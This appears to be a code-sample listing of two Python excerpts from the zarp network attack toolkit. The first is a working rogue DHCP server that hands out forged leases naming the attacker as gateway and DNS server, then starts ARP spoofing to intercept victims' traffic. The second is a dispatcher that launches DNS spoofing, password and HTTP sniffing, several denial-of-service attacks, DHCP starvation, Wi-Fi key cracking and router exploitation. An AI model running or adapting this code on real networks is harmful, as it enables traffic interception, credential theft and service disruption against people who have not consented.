示例#1
0
文件: dhcp.py 项目: fabaff/zarp
	def pkt_handler(self, pkt):
		# is this a DHCP packet!? 
		if self.running and DHCP in pkt:
			for opt in pkt[DHCP].options:
				# if the option is a REQUEST
				if type(opt) is tuple and opt[1] == 3:
					fam,hw = get_if_raw_hwaddr(conf.iface)

					# get the requested address
					requested_addr = None
					for item in pkt[DHCP].options:
						if item[0] == 'requested_addr':
							requested_addr = item[1]
					
					# if the IP address is the one we've reserved for it, we're golden.  Otherwise
					# we need to check if the one they're requesting is free
					if self.curr_ip != requested_addr:
						if not requested_addr in self.spoofed_hosts:
							# ip is free, set and use it
							self.curr_ip = requested_addr
						else:
							# ip is in use; generate another
							if self.curr_ip is None:
								self.curr_ip = self.net_mask.split('/')[0] 
							else:
								self.curr_ip = util.next_ip(self.curr_ip)

					lease = Ether(dst='ff:ff:ff:ff:ff:ff',src=hw)/IP(src=self.gateway,dst='255.255.255.255')/UDP(sport=67,dport=68)
					lease /= BOOTP(op=2,chaddr=mac2str(pkt[Ether].src),yiaddr=self.curr_ip,xid=pkt[BOOTP].xid)
					lease /= DHCP(options=[('message-type','ack'),
										   ('server_id', self.gateway),
										   ('lease_time', 86400),
										   ('subnet_mask', '255.255.255.0'),
										   ('router', self.gateway), 
										   ('name_server', self.gateway),
										   'end'])
					sendp(lease, loop=False)

					if self.dump_data: util.Msg('Handed \'%s\' out to \'%s\''%(self.curr_ip, pkt[Ether].src))
					util.debug('Initializing ARP spoofing...')
					tmp = ARPSpoof()
					tmp.to_ip = self.curr_ip
					tmp.from_ip = self.gateway
					if not tmp.initialize_post_spoof() is None:
						self.spoofed_hosts[self.curr_ip] = tmp 
						util.debug('ARP spoofing successfully configured for \'%s\''%self.curr_ip)
					else:
						if self.dump_data: util.Error('ARP session unsuccessful for %s!  You may not be able to get in the middle of them!'%self.curr_ip)
				# discover; send offer
				elif type(opt) is tuple and opt[1] == 1:
					fam,hw = get_if_raw_hwaddr(conf.iface)

					if self.curr_ip is None:
						self.curr_ip = self.net_mask.split('/')[0]
					else:
						self.curr_ip = util.next_ip(self.curr_ip)

					# build and send the DHCP Offer
					offer = Ether(dst='ff:ff:ff:ff:ff:ff',src=hw)/IP(src=self.gateway,dst='255.255.255.255')/UDP(sport=67,dport=68)
					offer /= BOOTP(op=2,chaddr=mac2str(pkt[Ether].src),yiaddr=self.curr_ip,xid=pkt[BOOTP].xid)
					offer /= DHCP(options=[('message-type', 'offer'),
										   ('subnet_mask','255.255.255.0'),
										   ('lease_time', 86400), 
										   ('name_server', self.gateway), 
										   ('router',self.gateway),
										    'end'])
					sendp(offer, loop=False)
					if self.dump_data: util.Msg('Sent DHCP offer for \'%s\' to \'%s\''%(self.curr_ip, pkt[Ether].src))
示例#2
0
文件: stream.py 项目: fabaff/zarp
def initialize(module):
	global static_singles, arp_sessions, http_sniffers, password_sniffers, services
	debug("Received module start for: %s"%(module))
	if module == 'arp':
		tmp = ARPSpoof() 
		to_ip = tmp.initialize()
		if not to_ip is None:
			debug("Storing session for %s"%to_ip)
			arp_sessions[to_ip] = tmp
		del(tmp)
	elif module == 'dns':
		dump_module_sessions('arp')
		(module, number) = get_session_input()
		ip = get_key(module,number)
		if not ip is None:
			arp_sessions[ip].init_dns_spoof()
	elif module == 'dhcp':
		tmp = DHCPSpoof()
		if tmp.initialize():
			static_singles['rogue_dhcp'] = tmp
	elif module == 'ndp':
		ndp_dos.initialize()	
	elif module == 'http_sniffer':
		tmp = HTTPSniffer()
		to_ip = tmp.initialize()
		if not to_ip is None:
			debug("Storing sniffer for %s"%to_ip)
			http_sniffers[to_ip] = tmp
	elif module == 'password_sniffer':
		tmp = PasswordSniffer()
		to_ip = tmp.initialize()
		if not to_ip is None:
			debug("Storing sniffer for %s"%to_ip)
			password_sniffers[to_ip] = tmp
	elif module == 'traffic_sniffer':
		tmp = TrafficSniffer()
		to_ip = tmp.initialize()
		if not to_ip is None:
			debug('Storing sniffer for %s'%to_ip)
			traffic_sniffers[to_ip] = tmp
	elif module == 'nestea':
		nestea_dos.initialize()
	elif module == 'land':
		land_dos.initialize()
	elif module == 'smb2':
		smb2_dos.initialize()
	elif module == 'net_map':
		static_singles['netscan'] = NetMap()
		static_singles['netscan'].initialize()
	elif module == 'service_scan':
		service_scan.initialize()
	elif module == 'dhcp_starv':
		dhcp_starvation.initialize()
	elif module == 'ap_scan':
		return ap_scan.initialize()	
	elif module == 'wep_crack':
		ap_crack.initialize('wep')
	elif module == 'wpa_crack':
		ap_crack.initialize('wpa')
	elif module == 'wps_crack':
		ap_crack.initialize('wps')
	elif module == 'router_pwn':
		router_pwn.initialize()
	elif module == 'tcp_syn':
		tcp_syn.initialize()
	elif module == 'nbns':
		tmp = NBNSSpoof()
		if tmp.initialize():
			static_singles['nbnspoof'] = tmp
	elif module == 'ftp_server':
		tmp = FTPService()
		tmp.initialize_bg()
		services['ftp'] = tmp
	elif module == 'http_server':
		tmp = HTTPService()
		tmp.initialize_bg()
		services['http'] = tmp
	elif module == 'ssh_server':
		tmp = SSHService()
		if not tmp.initialize_bg():
			return
		services['ssh'] = tmp
	elif module == 'access_point':
		tmp = APService()
		if tmp.initialize_bg():
			services['wireless ap'] = tmp
	elif module == 'smb':
		tmp = SMBService()
		tmp.initialize_bg()
		services['smb'] = tmp
	else:
		Error('Module \'%s\' does not exist.'%module)